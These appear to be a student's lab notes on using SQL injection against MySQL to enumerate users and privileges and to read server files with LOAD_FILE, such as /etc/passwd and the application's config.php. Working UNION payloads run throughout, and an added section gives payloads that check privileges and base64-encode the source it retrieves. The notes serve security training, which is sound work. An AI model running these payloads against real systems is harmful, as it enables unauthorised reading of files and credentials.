# Introduction

- In addition to gathering data from the various tables and databases within the DBMS, a SQL injection can also be leveraged to perform many other operations, such as reading and writing files on the server and even gaining RCE on the back-end server
- Reading data is much more common than writing data, which modern DBMSes strictly reserve for privileged users, as it can lead to system exploitation, as we will see
- With `MySQL`, the DB user must have the `FILE` privilege to load a file's content into a table and then dump data from that table, i.e. to read files. The same privilege gates `LOAD_FILE()`, `LOAD DATA` and `SELECT ... INTO OUTFILE`, and the server-side `secure_file_priv` setting can further restrict or disable file access regardless of the user's privileges

# Privileges

- First, we need to determine which database user we are running as, with one of the below queries or UNION payloads
- While we do not always need database administrator (DBA) privileges, needing them is increasingly common

```mysql
SELECT USER()          # the user@host the client presented
SELECT CURRENT_USER()  # the account actually used for authorisation; can differ from USER()
SELECT user FROM mysql.user

#UNION payloads
cn' UNION SELECT 1, user(), 3, 4-- -
cn' UNION SELECT 1, user, 3, 4 FROM mysql.user-- -
```

![[images/Pasted image 20251204151259.png]]

- Second, we need to determine the privileges of the current user with the below query or UNION payloads
- If the query returns `Y`, which means `YES`, the user holds MySQL's `SUPER` privilege, i.e. superuser privileges. The `file_priv` column of the same table tells us directly whether the account has the `FILE` privilege needed for the file reads below

```mysql
SELECT super_priv FROM mysql.user

#UNION payloads
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
```

![[images/Pasted image 20251204151312.png]]

- Alternatively, we can dump all privileges directly from the information schema with the below UNION payloads. Note that `grantee` is stored in the quoted form `'user'@'host'`, so a filter on it must match that format exactly

```mysql
# No user/grantee specified
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -

# User/grantee specified
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
```

![[images/Pasted image 20251204151448.png]]

# Using the `LOAD_FILE()` Function to Read Files

- Now that we know we have enough privileges to read local system files, let us do that using the `LOAD_FILE()` function
- The [LOAD_FILE()](https://mariadb.com/kb/en/load_file/) function can be used in MariaDB / MySQL to read data from files
- The function takes just one argument, the full path of the file to read
- It returns `NULL` rather than an error when the read fails: if the file does not exist, if the OS user running `mysqld` cannot read it, if the DB user lacks the `FILE` privilege, if `secure_file_priv` forbids the location, or if the file is larger than `max_allowed_packet`
- See the below query and UNION payload

```mysql
SELECT LOAD_FILE('/etc/passwd');

#UNION payload
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
```

![[images/Pasted image 20251204151642.png]]

## Second Example

- We know that the current page is `search.php`
- Furthermore, the default Apache webroot is `/var/www/html`
- With the above info in mind, let us try reading the source code of the file at `/var/www/html/search.php` with the below UNION payload

```mysql
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
```

![[images/Pasted image 20251204151748.png]]

- Here, the returned HTML is rendered by the browser, which hides the `<?php ... ?>` blocks
- We can view the full page source with `Ctrl+U` to reveal the entire PHP code

![[images/Pasted image 20251204151901.png]]

# Exercise

- Enumerate the current user with the below UNION payload

```mysql
cn' UNION SELECT 1, user(), 3, 4-- -
```

![[images/Pasted image 20251204172447.png]]

- Enumerate the privileges of each account, including `root`, with the below UNION payload

```mysql
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
```

![[images/Pasted image 20251204172542.png]]

- Read the source code of `search.php` using the below UNION payload

```mysql
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
```

![[images/Pasted image 20251204172703.png]]

- The source of `search.php` (snippet below) references `config.php`, so try to read that file as well using the below UNION payload

![[images/Pasted image 20251204172912.png]]

```mysql
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
```

![[images/Pasted image 20251204172958.png]]
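As an added example for the Privileges and `LOAD_FILE()` sections above (these queries are not from the original page or the course material it summarises), the following checks establish up front why a file read might silently return `NULL`, and retrieve a PHP file in a form the browser will not render. Assumptions: the injection point has four columns as in the payloads above, `cn` is the injected parameter value, and the `mysql` system tables are readable, which the page already relies on.

```sql
-- Added example, not from the original page. Assumes the same 4-column
-- injection point as the payloads above and that mysql.user is readable.

-- 1. Does the account we actually authenticated as hold the FILE privilege?
--    CURRENT_USER() is the account used for authorisation (USER() is the name
--    the client presented, which can differ) and it returns 'user@host'.
SELECT user, host, file_priv, super_priv
FROM mysql.user
WHERE CONCAT(user, '@', host) = CURRENT_USER();

-- 2. Where is mysqld allowed to read from?
--    ''      -> no restriction
--    NULL    -> file import/export disabled entirely
--    '/dir/' -> only files under that directory
SELECT @@secure_file_priv;

-- 3. Read with an explicit marker so that a NULL (no FILE privilege, file
--    missing, not readable by the mysqld OS user, blocked by secure_file_priv,
--    or larger than max_allowed_packet) is not mistaken for an empty file.
SELECT IFNULL(LOAD_FILE('/etc/passwd'), '<LOAD_FILE returned NULL>');

-- 4. Retrieve PHP source without the browser rendering it: base64 passes
--    through HTML rendering intact and decodes to the exact bytes on disk.
SELECT TO_BASE64(LOAD_FILE('/var/www/html/config.php'));

-- The same checks as UNION payloads for the injection point used on this page.
cn' UNION SELECT 1, CONCAT(user, '@', host, ' file_priv=', file_priv), @@secure_file_priv, 4 FROM mysql.user WHERE CONCAT(user, '@', host) = CURRENT_USER()-- -
cn' UNION SELECT 1, IFNULL(LOAD_FILE("/etc/passwd"), "<NULL>"), 3, 4-- -
cn' UNION SELECT 1, TO_BASE64(LOAD_FILE("/var/www/html/config.php")), 3, 4-- -
```

If the first payload shows `file_priv=N`, or `secure_file_priv` is `NULL` or a directory outside the webroot, `LOAD_FILE()` will return `NULL` for `/var/www/html/config.php` no matter how the payload is written, so there is no point iterating on paths. The base64 output from the last payload can be copied out of the page and decoded locally (for example with `base64 -d`) to recover the source exactly, including the `<?php ... ?>` blocks that the rendered page hides.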